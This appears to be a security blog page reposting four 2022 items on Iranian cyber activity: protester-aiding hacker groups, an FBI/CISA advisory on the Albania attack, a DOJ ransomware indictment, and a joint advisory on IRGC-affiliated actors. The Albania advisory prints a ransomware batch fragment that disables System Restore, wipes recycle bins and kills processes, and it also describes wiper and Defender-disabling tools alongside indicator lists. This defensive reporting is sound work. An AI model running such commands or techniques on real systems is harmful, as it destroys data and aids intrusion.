Protesters against the Iran regime are getting a boost to aid their efforts from hacking groups who are using Telegram, Signal and the dark web to get around government restrictions.
“Key activities are data leaking and selling, including officials’ phone numbers and emails, and maps of sensitive locations. CPR sees the sharing of open VPN servers to bypass censorship and reports on the internet status in Iran, as well as the hacking of conversations and guides,” according to a blog post by Check Point Research (CPR), which shared five examples of the counterprotesters’ activities.
Telegram groups, the researchers said, include between 900 to 1,200 members, some of which offer a list of proxies and a VPN to maneuver around Iranian government censorship while another group helps protesters gain access to social media.
CPR noted the activities the day after protests began following the death of Mahsa Amini. “Specifically, hacker groups are allowing people in Iran to communicate with each other, share news and what is going on in different places, which is what the government is trying to avoid, to lower the flames,” CPR said. “As per usual with these uprisings, there are some hacking groups that are trying to make a profit from the situation and to sell information from Iran and the regime.”
Researchers specifically called out the Official Atlas Intelligence Group channel, a group with 900 members that uses Telegram to leak and sell data. They are “focusing on leaking data that can help against the regime in Iran, including officials’ phone numbers and emails and maps of sensitive locations,” PCR said, as well as “upsell” private information on the Iranian Revolutionary Guard Corp (RGC). They are also offering a list of proxies to help protesters bypass censorship in Iran.
The 5,000-strong Arvin group is also using the messaging platform to leak and sell data. Its focus is “on news from the protests in Iran, reports and videos from the streets where the protests are in Iran,” CPR said. They also provide Open VPN services and report on internet status in the country.
Red Blue is another group with 4,000 members and is also using Telegram to hack…
https://spinsafe.com/wp-content/uploads/2022/09/Hackers-Sandbox.jpg330770SecureTechhttps://spinsafe.com/wp-content/uploads/2024/01/SS-Logo.svgSecureTech2022-09-30 23:30:102022-09-30 23:30:10Hackers Use Telegram, Signal, Dark Web to Help Iranian Protesters
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in July and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption and wiper attacks. Additional information concerning files used by the actors during their exploitation of and cyber attack against the victim organization is provided in Appendices A and B.
In July 2022, Iranian state cyber actors—identifying as “HomeLand Justice”—launched a destructive cyber attack against the Government of Albania which rendered websites and services unavailable. A FBI investigation indicates Iranian state cyber actors acquired initial access to the victim’s network approximately 14 months before launching the destructive cyber attack, which included a ransomware-style file encryptor and disk wiping malware. The actors maintained continuous network access for approximately a year, periodically accessing and exfiltrating e-mail content.
Between May and June 2022, Iranian state cyber actors conducted lateral movements, network reconnaissance, and credential harvesting from Albanian government networks. In July 2022, the actors launched ransomware on the networks, leaving an anti-Mujahideen E-Khalq (MEK) message on desktops. When network defenders identified and began to respond to the ransomware activity, the cyber actors deployed a version of ZeroCleare destructive malware.
In June 2022, HomeLand Justice created a website and multiple social media profiles posting anti-MEK messages. On July 18, 2022, HomeLand Justice claimed credit for the cyber attack on Albanian government infrastructure. On July 23, 2022, Homeland Justice posted videos of the cyber attack on their website. From late July to mid-August 2022, social media accounts associated with HomeLand Justice demonstrated a repeated pattern of advertising Albanian Government information for release, posting a poll asking respondents to select the government information to be released by HomeLand Justice, and then releasing that information—either in a .zip file or a video of a screen recording with the documents shown.
In September 2022, Iranian cyber actors launched another wave of cyber attacks against the Government of Albania, using similar TTPs and malware as the cyber attacks in July. These were likely done in retaliation for public attribution of the cyber attacks in July and severed diplomatic ties between Albania and Iran.
Download the PDF version of this report: pdf, 1221 kb
Initial access
Timeframe: Approximately 14 months before encryption and wiper attacks.
Details: Initial access was obtained via exploitation of an Internet-facing Microsoft SharePoint, exploiting CVE-2019-0604.
Persistence and Lateral movement
Timeframe: Approximately several days to two months after initial compromise.
Details: After obtaining access to the victim environment, the actors used several .aspx webshells, pickers.aspx, error4.aspx, and ClientBin.aspx, to maintain persistence. During this timeframe, the actors also used RDP (primarily), SMB, and FTP for lateral movement throughout the victim environment.
Exchange Server compromise
Timeframe: Approximately 1-6 months after initial compromise.
Details: The actors used a compromised Microsoft Exchange account to run searches (via CmdLets New-MailboxSearch and Get-Recipient) on various mailboxes, including for administrator accounts. In this timeframe, the actors used the compromised account to create a new Exchange account and add it to the Organization Management role group.
Likely Email exfiltration
Timeframe: Approximately 8 months after initial compromise.
Details: The actors made thousands of HTTP POST requests to Exchange servers of the victim organization. The FBI observed the client transferring roughly 70-160 MB of data, and the server transferring roughly 3-20 GB of data.
VPN activity
Timeframe: Approximately 12-14 months after initial compromise.
Details: Approximately twelve months after initial access and two months before launching the destructive cyber attack, the actors made connections to IP addresses belonging to the victim organization’s Virtual Private Network (VPN) appliance. The actors’ activity primarily involved two compromised accounts. The actors executed the “Advanced Port Scanner” (advanced_port_scanner.exe). The FBI also found evidence of Mimikatz usage and LSASS dumping.
File Cryptor (ransomware-style file encryptor)
Timeframe: Approximately 14 months after initial compromise.
Details: For the encryption component of the cyber attack, the actor logged in to a victim organization print server via RDP and kicked off a process (Mellona.exe) which would propagate the GoXml.exe encryptor to a list of internal machines, along with a persistence script called win.bat. As deployed, GoXML.exe encrypted all files (except those having extensions .exe, .dll, .sys, .lnk, or .lck) on the target system, leaving behind a ransom note titled How_To_Unlock_MyFiles.txt in each folder impacted.
Wiper attack
Timeframe: Approximately 14 months after initial compromise.
Details: In the same timeframe as the encryption attack, the actors began actions that resulted in raw disk drives being wiped with the Disk Wiper tool (cl.exe) described in Appendix A. Approximately over the next eight hours, numerous RDP connections were logged from an identified victim server to other hosts on the victim’s network. Command line execution of cl.exe was observed in cached bitmap files from these RDP sessions on the victim server.
Ensure anti-virus and anti-malware software is enabled and signature definitions are updated regularly and in a timely manner. Well-maintained anti-virus software may prevent use of commonly deployed cyber attacker tools that are delivered via spear-phishing.
Adopt threat reputation services at the network device, operating system, application, and email service levels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spear-phishing attacks.
If your organization is employing certain types of software and appliances vulnerable to known Common Vulnerabilities and Exposures (CVEs), ensure those vulnerabilities are patched. Prioritize patching known exploited vulnerabilities.
Monitor for unusually large amounts of data (i.e. several GB) being transferred from a Microsoft Exchange server.
Check the host-based indications, including webshells, for positive hits within your environment.
Additionally, FBI and CISA recommend organizations apply the following best practices to reduce risk of compromise:
Maintain and test an incident response plan.
Ensure your organization has a vulnerability management program in place and that it prioritizes patch management and vulnerability scanning of known exploited vulnerabilities. Note: CISA’s Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations.
Properly configure and secure internet-facing network devices.
Do not expose management interfaces to the internet.
Disable unused or unnecessary network ports and protocols.
Disable/remove unused network services and devices.
Additional details concerning some of these files are provided in Appendix B.
File
MD5 Hash
Notes
Error4.aspx
81e123351eb80e605ad73268a5653ff3
Webshell
cl.exe
7b71764236f244ae971742ee1bc6b098
Wiper
GoXML.exe
bbe983dba3bf319621b447618548b740
Encryptor
Goxml.jpg
0738242a521bdfe1f3ecc173f1726aa1
ClientBin.aspx
a9fa6cfdba41c57d8094545e9b56db36
Webshell (reverse-proxy connections)
Pickers.aspx
8f766dea3afd410ebcd5df5994a3c571
Webshell
evaluatesiteupgrade.cs.aspx
Unknown
Webshell
mellona.exe
78562ba0069d4235f28efd01e3f32a82
Propagation for Encryptor
win.bat
1635e1acd72809479e21b0ac5497a79b
Launches GoXml.exe on startup
win.bat
18e01dee14167c1cf8a58b6a648ee049
Changes desktop background to encryption image
bb.bat
59a85e8ec23ef5b5c215cd5c8e5bc2ab
Saves SAM and SYSTEM hives to C:\Temp, makes cab archive
disable_defender.exe
60afb1e62ac61424a542b8c7b4d2cf01
Disables Windows Defender
rwdsk.sys
8f6e7653807ebb57ecc549cef991d505
Raw disk driver utilized by wiper malware
App_Web_bckwssht.dll
e9b6ecbf0783fa9d6981bba76d949c94
Network-based IOCs
FBI review of Commercial VPN service IP addresses revealed the following resolutions (per Akamai data):
Country
Company
AL
KEMINET LTD.
DE
NOOP-84-247-59-0-25
DE
GSL NETWORKS
GB
LON-CLIENTS
GB
GB-DATACENTER
NL
NL-LAYERSWITCH-20190220
NL
PANQ-45-86-200-0
US
PRIVATE CUSTOMER
US
BANDITO NETWORKS
US
EXTERNAL
US
RU-SELENA-20080725
US
TRANS OCEAN NETWORK
Appendix B
Ransomware Cryptor
GoXML.exe is a ransomware style file encryptor. It is a Windows executable, digitally signed with a certificate issued to the Kuwait Telecommunications Company KSC, a subsidiary of Saudi Telecommunications Company (STC).
If executed with five or more arguments (the arguments can be anything, as long as there are five or more), the program silently engages its file encryption functionality. Otherwise, a file-open dialog Window is presented, and any opened documents receive an error prompt labeled, Xml Form Builder.
All internal strings are encrypted with a hard coded RC4 key. Before internal data is decrypted, the string decryption routine has a built-in self-test that decrypts a DWORD value and tests to see if the plaintext is the string yes. If so, it will continue to decode its internal strings.
The ransomware will attempt to launch the following batch script; however, this will fail due to a syntax error.
@for /F “skip=1” %C in (‘wmic LogicalDisk get DeviceID’) do (@wmic /namespace:\\root\default Path SystemRestore Call disable “%C\” & @rd /s /q %C\$Recycle.bin)
@for %C in (%PrcLst%) do @taskkill /f /im “%C.exe”
@set PrcLst=
@exit
The syntax error consists of a missing backslash that separates system32 and cmd.exe, so the process is launched as system32cmd.exe which is an invalid command.
The ransomware’s file encryption routine will generate a random string, take the MD5 hash and use that to generate an RC4 128 key which is used to encrypt files. This key is encrypted with a hard coded Public RSA key and converted to Base64 utilizing a custom alphabet. This is appended to the end of the ransom note.
The cryptor places a file called How_To_Unlock_MyFiles.txt in directories with encrypted files.
Each encrypted file is given the .lck extension and the contents of each file are only encrypted up to 0x100000 or 1,048,576 bytes which is a hard coded limit.
Separately, the actor ran a batch script (win.bat below) to set a specific desktop background.
The files cl.exe and rwdsk.sys are part of a disk wiper utility that provides raw access to the hard drive for the purposes of wiping data. From the command line the cl.exe file accepts the arguments:
in
un
wp <optional argument>
If executed with the in command, the utility will output in start! and installs a hard coded file named rwdsk.sys as a service named RawDisk3. The .SYS file is not extracted from the installer however, but rather the installer looks for the file in the same directory that the cl.exe is executed in.
It will also load the driver after installation.
The un command uninstalls the service, outputting the message “un start!” to the terminal. The wp command will access the loaded driver for raw disk access.
The long hexadecimal string is hard coded in the cl.exe binary.
The wp command also takes an additional argument as a device path to place after \RawDisk3\ in the output string. It is uncertain what creates this path to a device as the driver tested did not.
The output is “wp starts!” followed by the total bytes of the drive and the time the wipe operation takes.
If the registry key value HKLM\SOFTWARE\EldoS\EventLog is set to “Enabled”, the install will generate an event log if at any time the install produces an error. This log contains an error code DWORD followed by the string ..\..\DriverLibraries\DrvSupLib\install.c. If the system does not have the SOFTWARE\EldoS key, no event logs would be produced. This feature must be a related to the legitimate EldoS utility.
rwdsk.sys is a “legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer’s hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.”
C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA
Cert #1 SHA1
30632ea310114105969d0bda28fdce267104754f
Cert #2 Subject
C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. – For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority – G5
C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA
Cert #3 Issuer
C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. – For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority – G5
Cert #3 SHA1
495847a93187cfb8c71f840cb7b41497ad95c64f
Additional Files
Web Deployed Reverse Proxy
Description
ClientBin.aspx is an ASP file that contains a Base64 encoded .Net executable (App_Web_bckwssht.dll) that it decodes and loads via Reflection. The .Net executable contains Class and Method obfuscation and internal strings are encoded with a single byte XOR obfuscation.
Sending a POST request with a Base64 encoded IP and port will open a second socket to the supplied IP and port making this a Web proxy.
Sending a request to WV-RESET with a value will produce an OK response and call a function to shut down the proxy socket.
The DLL extracts a secondary “EncryptionDLL” named Base64.dll which is loaded via Assembly.Load. This exposes two functions, encrypt and decrypt. This DLL is used to decrypt the Proxy IP and port along with data. In this instance the class name is misspelled Bsae64, which is also reflected in the calling DLLs decoded strings. It is uncertain as to why an additional Base64.dll binary is extracted when the same encoding could be hard coded in the original DLL. It is possible other versions of this tool utilize differing “EncryptionDLL” binaries.
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
PEtype
DLL
PE Header Timestamp
2021-06-07 10:37:55
ImpHash
dae02f32a21e03ce65412f6e56942daa
Disable Defender
Description
disable_defender.exe is a Microsoft Windows PE file that attempts to disable Windows Defender. The application will elevate privileges to that of SYSTEM and then attempt to disable Defender’s core functions. A command prompt with status and error messages is displayed as the application executes. No network activity was detected during the evaluation.
Upon execution, a command prompt is launched and a message is displayed if the process is not running as SYSTEM. The process is then restarted with the required permissions.
The application will attempt to terminate the Windows Defender process by calling TerminateProcess for smartscreen.exe:
The following Registry Keys were modified to disable Windows Defender:
https://spinsafe.com/wp-content/uploads/2022/09/Iranian-State-Actors-Conduct-Cyber-Operations-Against-the-Government-of.png49624SecureTechhttps://spinsafe.com/wp-content/uploads/2024/01/SS-Logo.svgSecureTech2022-09-22 03:30:102022-09-22 03:30:10Iranian State Actors Conduct Cyber Operations Against the Government of Albania
The U.S. Department of Justice unsealed an indictment Sept. 14 charging three Iranian nationals with allegedly running a massive, global ransomware operation that hacked into the computer networks of multiple U.S. victims, including several in the Garden State.
The indictment charges Mansour Ahmadi, Ahmad Khatibi Aghda and Amir Hossein Nickaein Ravari of engaging in the scheme. The three, who are residents of Iran, are each charged with one count of conspiring to commit computer fraud and related activity, one count of intentionally damaging a protected computer, and one count of transmitting a demand in relation to damaging a protected computer.
“The Government of Iran has created a safe haven where cyber criminals acting for personal gain flourish and defendants like these are able to hack and extort victims, including critical infrastructure providers,” said Assistant Attorney General Matthew Olsen of the Justice Department’s National Security Division. “This indictment makes clear that even other Iranians are less safe because their own government fails to follow international norms and stop Iranian cyber criminals.”
Staying safe
The hacking allegedly exploited vulnerabilities in software and networks to gain access and exfiltrate data and information from victims’ computer systems. The indictment also accuses the trio of denying victims access to their systems and data unless a ransom payment was made.
The three men are accused of victimizing a broad range of organizations, including small businesses, government agencies, nonprofit programs and institutions, as well as critical infrastructure sectors such as health care centers, transportation services and utility providers.
Here in New Jersey, according to court documents, the defendants targeted a township in Union County in February 2021, gaining control and access to the township’s network and data and using a hacking tool to establish persistent remote access to a particular domain that was registered to one of the men.
They are also accused of targeting a Morris County-based accounting firm in or before February 2022, using a hacking tool to establish a connection to a server registered to one of…
https://spinsafe.com/wp-content/uploads/2022/09/cybersecurity-digital-stock-art.jpg390700SecureTechhttps://spinsafe.com/wp-content/uploads/2024/01/SS-Logo.svgSecureTech2022-09-15 10:00:122022-09-15 10:00:12Three Iranian nationals charged with hacking New Jersey targets
This joint Cybersecurity Advisory (CSA) is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), U.S. Cyber Command (USCC) – Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), and the United Kingdom’s National Cyber Security Centre (NCSC) to highlight continued malicious cyber activity by advanced persistent threat (APT) actors that the authoring agencies assess are affiliated with the Iranian Government’s Islamic Revolutionary Guard Corps (IRGC). Note: The IRGC is an Iranian Government agency tasked with defending the Iranian Regime from perceived internal and external threats. Hereafter, this advisory refers to all the coauthors of this advisory as “the authoring agencies.”
Since the initial reporting of this activity in the FBI Liaison Alert System (FLASH) report APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity from May 2021, the authoring agencies have continued to observe these IRGC-affiliated actors exploiting known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities for initial access. The IRGC-affiliated actors have used this access for follow-on activity, including disk encryption and data extortion, to support ransom operations.
The IRGC-affiliated actors are actively targeting a broad range of entities, including entities across multiple U.S. critical infrastructure sectors as well as Australian, Canadian, and United Kingdom organizations. These actors often operate under the auspices of Najee Technology Hooshmand Fater LLC, based in Karaj, Iran, and Afkar System Yazd Company, based in Yazd, Iran. The authoring agencies assess the actors are exploiting known vulnerabilities on unprotected networks rather than targeting specific targeted entities or sectors.
This advisory provides observed tactics, techniques, and indicators of compromise (IOCs) that the authoring agencies assess are likely associated with this IRGC-affiliated APT. The authoring agencies urge organizations, especially critical infrastructure organizations, to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from these IRGC-affiliated cyber actors.
Download the PDF version of this report: pdf, 836 kb
Technical Details
Threat Actor Activity
As reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the authoring agencies have observed Iranian government-sponsored APT actors scanning for and/or exploiting the following known Fortinet FortiOS and Microsoft Exchange server vulnerabilities since early 2021 to gain initial access to a broad range of targeted entities: CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, and CVE-2021-34473 (a ProxyShell vulnerability). The authoring agencies have also observed these APT actors leveraging CVE-2021-34473 against U.S. networks in combination with ProxyShell vulnerabilities CVE-2021-34523 and CVE-2021-31207. The NCSC judges that Yazd, Iran-based company Afkar System Yazd Company is actively targeting UK organizations. Additionally, ACSC judges that these APT actors have used CVE-2021-34473 in Australia to gain access to systems. The APT actors can leverage this access for further malicious activities, including deployment of tools to support ransom and extortion operations, and data exfiltration.
Since the activity was reported in 2021, these IRGC-affiliated actors have continued to exploit known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities CVE-2021-44228 (“Log4Shell”), CVE-2021-45046, and CVE-2021-45105 for initial access.
The IRGC-affiliated actors have used their access for ransom operations, including disk encryption and extortion efforts. After gaining access to a network, the IRGC-affiliated actors likely determine a course of action based on their perceived value of the data. Depending on the perceived value, the actors may encrypt data for ransom and/or exfiltrate data. The actors may sell the data or use the exfiltrated data in extortion operations or “double extortion” ransom operations where a threat actor uses a combination of encryption and data theft to pressure targeted entities to pay ransom demands.
IRGC-affiliated actor activity observed by the authoring agencies includes:
In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) on a Microsoft Exchange server to gain access to the network of a U.S. police department. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom.
In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), on a Microsoft Exchange server to gain access to the network of a U.S. regional transportation company. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom. This activity disrupted the transportation company’s operations for an extended period.
In February 2022, the actors exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105) in a VMware Horizon application to gain access to the network of a U.S. municipal government, move laterally within the network, establish persistent access, initiate crypto-mining operations, and conduct additional malicious activity.
In February 2022, the actors may have exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021) to gain access to the network of a U.S. aerospace company. The actors leveraged a server that the authoring agencies assess is associated with the IRGC-affiliated actors to exfiltrate data from the company’s network.
MITRE ATT&CK® Tactics and Techniques
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 11. See Appendix B for a table of the MITRE ATT&CK tactics and techniques observed.
The authoring agencies assess the following tactics and techniques are associated with this activity.
The IRGC-affiliated actors have used the following malicious and legitimate tools [T1588.001, T1588.002] for a variety of tactics across the enterprise spectrum:
Fast Reverse Proxy (FRP) for command and control (C2)
Plink for C2
Remote Desktop Protocol (RDP) for lateral movement
BitLocker for data encryption
SoftPerfect Network Scanner for system network configuration discovery
The following IOCs, observed as of March 2022, are indicative of ProxyShell vulnerability exploitation on targeted entity networks:
Web shells with naming conventions aspx_[11 randomly generated alphabetic characters].aspx, login.aspx, or default.aspx in any of the following directories:
The IRGC-affiliated actors may have made modifications to the Task Scheduler [T1053.005]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:
The IRGC-affiliated actors established new user accounts on domain controllers, servers, workstations, and active directories [T1136.001, T1136.002]. The actors enabled a built-in Windows account (DefaultAccount) and escalated privileges to gain administrator-level access to a network. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:
The authoring agencies have observed the IRGC-affiliated actors dumping and subsequently exfiltrating the Local Security Authority Subsystem Service (LSASS) process memory on targeted entity networks in furtherance of credential harvesting. The following IOCs are associated with data exfiltration from targeted entity networks:
The IRGC-affiliated actors forced BitLocker activation on host networks to encrypt data [T1486] and held the decryption keys for ransom. The corresponding ransom notes were sent to the targeted entity, left on the targeted entity network as a .txt file or printed on the targeted entity’s networked printer(s). The notes included the following contact information:
The authoring agencies recommend that organizations using Microsoft Exchange servers, Fortinet devices, and/or VMware Horizon applications investigate potential suspicious activity in their networks.
Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts.
Note: Refer to Appendix A for IOCs.
Review Log4j vulnerabilities, including CVE-2021-44228, CVE-2021-45046, and CVE-2021- 45105.
Review Microsoft Exchange ProxyShell vulnerabilities, including CVE-2021-34473, CVE-2021- 34523, and CVE-2021-31207.
As a precaution, review additional Microsoft Exchange vulnerabilities, including CVE-2021- 31196, CVE-2021-31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470 because the authoring agencies have seen the actors broadly target Microsoft Exchange servers.
Investigate exposed Microsoft Exchange servers, both patched and unpatched, for compromise.
Review Fortinet FortiOS vulnerabilities, including CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.
Review VMware vulnerabilities, including any relevant vulnerabilities listed on the VMware security advisory page.
Investigate changes to RDP, firewall, and Windows Remote Management (WinRM) configurations that may allow malicious cyber actors to maintain persistent access.
Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system and scheduled tasks—including each step these tasks perform—for unrecognized “actions.”
Review antivirus logs for indications they were unexpectedly turned off.
Look for WinRAR and FileZilla in unexpected locations.
Review servers and workstations for malicious executable files masquerading as legitimate Windows processes. Malicious files may not be found in the expected directory and may have cmd.exe or powershell.exe as their parent process.
The authoring agencies urge network defenders to prepare for and mitigate potential cyber threats immediately by implementing the mitigations below.
Implement and Enforce Backup and Restoration Policies and Procedures
Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware or other destructive data incident and protect against data losses.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
Activate BitLocker on all networks and securely back up BitLocker keys with Microsoft and with an independent offline backup.
Create, maintain, and exercise a basic cyber incident response plan that includes response procedures for a ransom incident.
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).
Patch and Update Systems
U.S. federal, state, local, tribal, and territorial (SLTT) government and critical infrastructure organizations: Implement free CISA Cyber Hygiene Services Vulnerability Scanning to enable continuous scans of public, static IPs for accessible services and vulnerabilities.
Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. Regularly check software updates and end-of-life notifications. Consider leveraging a centralized patch management system to automate and expedite the process.
Immediately patch software affected by vulnerabilities identified in this advisory: CVE-2021- 34473, CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, CVE-2021-34523, CVE-2021- 31207, CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-31196, CVE-2021- 31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470.
Evaluate and Update Blocklists and Allowlists
Regularly evaluate and update blocklists and allowlists.
If FortiOS is not used by your organization, add the key artifact files used by FortiOS to your organization’s execution blocklist. Prevent any attempts to install or run this program and its associated files.
Implement Network Segmentation
Implement network segmentation to restrict a malicious threat actor’s lateral movement.
Secure User Accounts
Audit user accounts with administrative privileges and configure access controls under the principles of least privilege and separation of duties.
Require administrator credentials to install software.
Implement Multifactor Authentication
Use multifactor authentication where possible, particularly for webmail, virtual private networks (VPNs), accounts that access critical systems, and privileged accounts that manage backups.
Use Strong Passwords
Secure and Monitor RDP and other Potentially Risky Services
If you use RDP, restrict it to limit access to resources over internal networks. After assessing risks, if your organization deems RDP operationally necessary, restrict the originating sources, and require MFA to mitigate credential theft and reuse. If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices.
Disable unused remote access/RDP ports.
Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts (to block brute force campaigns), and log RDP login attempts.
Use Antivirus Programs
Install and regularly update antivirus and anti-malware software on all hosts.
Secure Remote Access
Only use secure networks.
Consider installing and using a VPN for remote access.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see Appendix B).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESPONDING TO RANSOMWARE OR EXTORTION INCIDENTS
If a ransomware or extortion incident occurs at your organization:
Note: The authoring agencies strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.
RESOURCES
The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
For more information on malicious cyber activity affiliated with the Iranian government- sponsored malicious cyber activity, see us-cert.cisa.gov/Iran and FBI’s Iran Threat page.
For information and resources on protecting against and responding to ransomware or extortion activity, refer to StopRansomware.gov, the U.S. centralized, whole-of-government webpage providing ransomware resources and alerts.
The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate malicious activity.
ACSC can provide tailored cyber security advice and assistance, reporting, and incident response support at cyber.gov.au and via 1300 292 371 (1300 CYBER1).
PURPOSE
This advisory was developed by U.S., Australian, Canadian, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. FBI, CISA, NSA, USCC-CNMF, DoT, ACSC, CCCS, and NCSC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.
APPENDIX A: INDICATORS OF COMPROMISE
IP addresses and executables files are listed below. For a downloadable copy of IOCs, see AA22- 257A.stix.
IP Addresses
54.39.78[.]148
95.217.193[.]86
104.168.117[.]149
107.173.231[.]114
144.76.186[.]88
148.251.71[.]182
172.245.26[.]118
185.141.212[.]131
198.12.65[.]175
198.144.189[.]74
Note: Some of these observed IP addresses may be outdated. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.
https://spinsafe.com/wp-content/uploads/2024/01/SS-Logo.svg00SecureTechhttps://spinsafe.com/wp-content/uploads/2024/01/SS-Logo.svgSecureTech2022-09-14 22:30:082022-09-14 22:30:08Iranian Islamic Revolutionary Guard Corps-Affiliated Cyber Actors Exploiting Vulnerabilities for Data Extortion and Disk Encryption for Ransom Operations